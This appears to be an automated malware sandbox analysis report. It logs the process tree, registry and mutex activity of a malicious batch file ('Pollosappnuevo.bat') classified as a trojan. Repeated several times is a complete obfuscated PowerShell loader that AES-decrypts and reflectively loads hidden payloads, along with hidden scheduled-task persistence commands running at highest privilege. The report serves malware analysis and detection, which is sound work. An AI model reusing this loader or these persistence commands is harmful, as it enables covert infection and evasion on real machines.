        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShell
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShell
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShell
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShell
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShell
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShell
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShell

        System Summary

        barindex
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\e45iasd.exeJump to dropped file
        Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1IDZ0tblUPImy6+cAa/0r4ufKoB0X6q7gAxomXAbqns='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ojV8xek5mRtM5RXRDDIF7w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $xCPmk=New-Object System.IO.MemoryStream(,$param_var); $wkaLh=New-Object System.IO.MemoryStream; $VHSAV=New-Object System.IO.Compression.GZipStream($xCPmk, [IO.Compression.CompressionMode]::Decompress); $VHSAV.CopyTo($wkaLh); $VHSAV.Dispose(); $xCPmk.Dispose(); $wkaLh.Dispose(); $wkaLh.ToArray();}function execute_function($param_var,$param2_var){ $cDSQK=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xoAaG=$cDSQK.EntryPoint; $xoAaG.Invoke($null, $param2_var);}$ASmjg = 'C:\Users\user\Desktop\Pollosappnuevo.bat';$host.UI.RawUI.WindowTitle = $ASmjg;$eFpSQ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($ASmjg).Split([Environment]::NewLine);foreach ($lDEYJ in $eFpSQ) { if ($lDEYJ.StartsWith(':: ')) { $dXBjK=$lDEYJ.Substring(3); break; }}$payloads_var=[string[]]$dXBjK.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\startup_str_616.bat" "
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1IDZ0tblUPImy6+cAa/0r4ufKoB0X6q7gAxomXAbqns='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ojV8xek5mRtM5RXRDDIF7w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $xCPmk=New-Object System.IO.MemoryStream(,$param_var); $wkaLh=New-Object System.IO.MemoryStream; $VHSAV=New-Object System.IO.Compression.GZipStream($xCPmk, [IO.Compression.CompressionMode]::Decompress); $VHSAV.CopyTo($wkaLh); $VHSAV.Dispose(); $xCPmk.Dispose(); $wkaLh.Dispose(); $wkaLh.ToArray();}function execute_function($param_var,$param2_var){ $cDSQK=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xoAaG=$cDSQK.EntryPoint; $xoAaG.Invoke($null, $param2_var);}$ASmjg = 'C:\Users\user\AppData\Roaming\startup_str_616.bat';$host.UI.RawUI.WindowTitle = $ASmjg;$eFpSQ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($ASmjg).Split([Environment]::NewLine);foreach ($lDEYJ in $eFpSQ) { if ($lDEYJ.StartsWith(':: ')) { $dXBjK=$lDEYJ.Substring(3); break; }}$payloads_var=[string[]]$dXBjK.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1IDZ0tblUPImy6+cAa/0r4ufKoB0X6q7gAxomXAbqns='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ojV8xek5mRtM5RXRDDIF7w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $xCPmk=New-Object System.IO.MemoryStream(,$param_var); $wkaLh=New-Object System.IO.MemoryStream; $VHSAV=New-Object System.IO.Compression.GZipStream($xCPmk, [IO.Compression.CompressionMode]::Decompress); $VHSAV.CopyTo($wkaLh); $VHSAV.Dispose(); $xCPmk.Dispose(); $wkaLh.Dispose(); $wkaLh.ToArray();}function execute_function($param_var,$param2_var){ $cDSQK=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xoAaG=$cDSQK.EntryPoint; $xoAaG.Invoke($null, $param2_var);}$ASmjg = 'C:\Users\user\Desktop\Pollosappnuevo.bat';$host.UI.RawUI.WindowTitle = $ASmjg;$eFpSQ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($ASmjg).Split([Environment]::NewLine);foreach ($lDEYJ in $eFpSQ) { if ($lDEYJ.StartsWith(':: ')) { $dXBjK=$lDEYJ.Substring(3); break; }}$payloads_var=[string[]]$dXBjK.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\startup_str_616.bat" "Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1IDZ0tblUPImy6+cAa/0r4ufKoB0X6q7gAxomXAbqns='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ojV8xek5mRtM5RXRDDIF7w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $xCPmk=New-Object System.IO.MemoryStream(,$param_var); $wkaLh=New-Object System.IO.MemoryStream; $VHSAV=New-Object System.IO.Compression.GZipStream($xCPmk, [IO.Compression.CompressionMode]::Decompress); $VHSAV.CopyTo($wkaLh); $VHSAV.Dispose(); $xCPmk.Dispose(); $wkaLh.Dispose(); $wkaLh.ToArray();}function execute_function($param_var,$param2_var){ $cDSQK=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xoAaG=$cDSQK.EntryPoint; $xoAaG.Invoke($null, $param2_var);}$ASmjg = 'C:\Users\user\AppData\Roaming\startup_str_616.bat';$host.UI.RawUI.WindowTitle = $ASmjg;$eFpSQ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($ASmjg).Split([Environment]::NewLine);foreach ($lDEYJ in $eFpSQ) { if ($lDEYJ.StartsWith(':: ')) { $dXBjK=$lDEYJ.Substring(3); break; }}$payloads_var=[string[]]$dXBjK.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF886C4C3F25_2_00007FF886C4C3F2
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF886C4B6465_2_00007FF886C4B646
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF886C4B1495_2_00007FF886C4B149
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeCode function: 24_2_00007FF886C56DF024_2_00007FF886C56DF0
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeCode function: 24_2_00007FF886C5F65824_2_00007FF886C5F658
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeCode function: 24_2_00007FF886C5D96D24_2_00007FF886C5D96D
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeCode function: 24_2_00007FF886C5F93024_2_00007FF886C5F930
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeCode function: 24_2_00007FF886C6DA2024_2_00007FF886C6DA20
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeCode function: 26_2_00007FF886C46DF026_2_00007FF886C46DF0
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeCode function: 26_2_00007FF886C4F6D526_2_00007FF886C4F6D5
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeCode function: 26_2_00007FF886C4DBD526_2_00007FF886C4DBD5
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeCode function: 26_2_00007FF886C4EA4026_2_00007FF886C4EA40
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeCode function: 26_2_00007FF886C5DA2026_2_00007FF886C5DA20
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeCode function: 26_2_00007FF886C4C93B26_2_00007FF886C4C93B
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeCode function: 26_2_00007FF886C4CA9026_2_00007FF886C4CA90
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeCode function: 26_2_00007FF886C4F2A426_2_00007FF886C4F2A4
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeCode function: 26_2_00007FF886C4CA3526_2_00007FF886C4CA35
        Source: 5.2.powershell.exe.263b4b2c370.10.raw.unpack, sjQgeJFGkOfBsyocSykt.csCryptographic APIs: 'TransformFinalBlock'
        Source: 5.2.powershell.exe.263b45551b0.9.raw.unpack, sjQgeJFGkOfBsyocSykt.csCryptographic APIs: 'TransformFinalBlock'
        Source: 5.2.powershell.exe.263bc030000.12.raw.unpack, sjQgeJFGkOfBsyocSykt.csCryptographic APIs: 'TransformFinalBlock'
        Source: 5.2.powershell.exe.263b45a51e8.8.raw.unpack, sjQgeJFGkOfBsyocSykt.csCryptographic APIs: 'TransformFinalBlock'
        Source: 5.2.powershell.exe.263b4b2c370.10.raw.unpack, sjQgeJFGkOfBsyocSykt.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: 5.2.powershell.exe.263b4b2c370.10.raw.unpack, sjQgeJFGkOfBsyocSykt.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
        Source: 5.2.powershell.exe.263b45a51e8.8.raw.unpack, sjQgeJFGkOfBsyocSykt.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: 5.2.powershell.exe.263b45a51e8.8.raw.unpack, sjQgeJFGkOfBsyocSykt.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
        Source: 5.2.powershell.exe.263b45551b0.9.raw.unpack, sjQgeJFGkOfBsyocSykt.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: 5.2.powershell.exe.263b45551b0.9.raw.unpack, sjQgeJFGkOfBsyocSykt.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
        Source: 5.2.powershell.exe.263bc030000.12.raw.unpack, sjQgeJFGkOfBsyocSykt.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: 5.2.powershell.exe.263bc030000.12.raw.unpack, sjQgeJFGkOfBsyocSykt.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
        Source: classification engineClassification label: mal100.troj.expl.evad.winBAT@33/23@1/2
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\startup_str_616.vbsJump to behavior
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5664:120:WilError_03
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeMutant created: NULL
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\JnG5DxKNjDpRvsxT
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2992:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8104:120:WilError_03
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeMutant created: \Sessions\1\BaseNamedObjects\PSReadLineHistoryFile_-257576312
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4144:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8172:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7836:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7764:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ekz4pmvr.jgv.ps1Jump to behavior
        Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Pollosappnuevo.bat" "
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_616_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\startup_str_616.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: C:\Windows\System32\net.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Pollosappnuevo.bat" "
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net file
        Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 file
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1IDZ0tblUPImy6+cAa/0r4ufKoB0X6q7gAxomXAbqns='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ojV8xek5mRtM5RXRDDIF7w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $xCPmk=New-Object System.IO.MemoryStream(,$param_var); $wkaLh=New-Object System.IO.MemoryStream; $VHSAV=New-Object System.IO.Compression.GZipStream($xCPmk, [IO.Compression.CompressionMode]::Decompress); $VHSAV.CopyTo($wkaLh); $VHSAV.Dispose(); $xCPmk.Dispose(); $wkaLh.Dispose(); $wkaLh.ToArray();}function execute_function($param_var,$param2_var){ $cDSQK=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xoAaG=$cDSQK.EntryPoint; $xoAaG.Invoke($null, $param2_var);}$ASmjg = 'C:\Users\user\Desktop\Pollosappnuevo.bat';$host.UI.RawUI.WindowTitle = $ASmjg;$eFpSQ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($ASmjg).Split([Environment]::NewLine);foreach ($lDEYJ in $eFpSQ) { if ($lDEYJ.StartsWith(':: ')) { $dXBjK=$lDEYJ.Substring(3); break; }}$payloads_var=[string[]]$dXBjK.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_616_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\startup_str_616.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\startup_str_616.vbs"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\startup_str_616.vbs"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\startup_str_616.bat" "
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net file
        Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 file
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1IDZ0tblUPImy6+cAa/0r4ufKoB0X6q7gAxomXAbqns='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ojV8xek5mRtM5RXRDDIF7w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $xCPmk=New-Object System.IO.MemoryStream(,$param_var); $wkaLh=New-Object System.IO.MemoryStream; $VHSAV=New-Object System.IO.Compression.GZipStream($xCPmk, [IO.Compression.CompressionMode]::Decompress); $VHSAV.CopyTo($wkaLh); $VHSAV.Dispose(); $xCPmk.Dispose(); $wkaLh.Dispose(); $wkaLh.ToArray();}function execute_function($param_var,$param2_var){ $cDSQK=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xoAaG=$cDSQK.EntryPoint; $xoAaG.Invoke($null, $param2_var);}$ASmjg = 'C:\Users\user\AppData\Roaming\startup_str_616.bat';$host.UI.RawUI.WindowTitle = $ASmjg;$eFpSQ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($ASmjg).Split([Environment]::NewLine);foreach ($lDEYJ in $eFpSQ) { if ($lDEYJ.StartsWith(':: ')) { $dXBjK=$lDEYJ.Substring(3); break; }}$payloads_var=[string[]]$dXBjK.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "e45iasd" /tr "C:\Users\user\AppData\Local\Temp\e45iasd.exe"
        Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\e45iasd.exe C:\Users\user\AppData\Local\Temp\e45iasd.exe
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\e45iasd.exe "C:\Users\user\AppData\Local\Temp\e45iasd.exe"
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\e45iasd.exe "C:\Users\user\AppData\Local\Temp\e45iasd.exe"
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net fileJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1IDZ0tblUPImy6+cAa/0r4ufKoB0X6q7gAxomXAbqns='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ojV8xek5mRtM5RXRDDIF7w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $xCPmk=New-Object System.IO.MemoryStream(,$param_var); $wkaLh=New-Object System.IO.MemoryStream; $VHSAV=New-Object System.IO.Compression.GZipStream($xCPmk, [IO.Compression.CompressionMode]::Decompress); $VHSAV.CopyTo($wkaLh); $VHSAV.Dispose(); $xCPmk.Dispose(); $wkaLh.Dispose(); $wkaLh.ToArray();}function execute_function($param_var,$param2_var){ $cDSQK=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xoAaG=$cDSQK.EntryPoint; $xoAaG.Invoke($null, $param2_var);}$ASmjg = 'C:\Users\user\Desktop\Pollosappnuevo.bat';$host.UI.RawUI.WindowTitle = $ASmjg;$eFpSQ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($ASmjg).Split([Environment]::NewLine);foreach ($lDEYJ in $eFpSQ) { if ($lDEYJ.StartsWith(':: ')) { $dXBjK=$lDEYJ.Substring(3); break; }}$payloads_var=[string[]]$dXBjK.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function 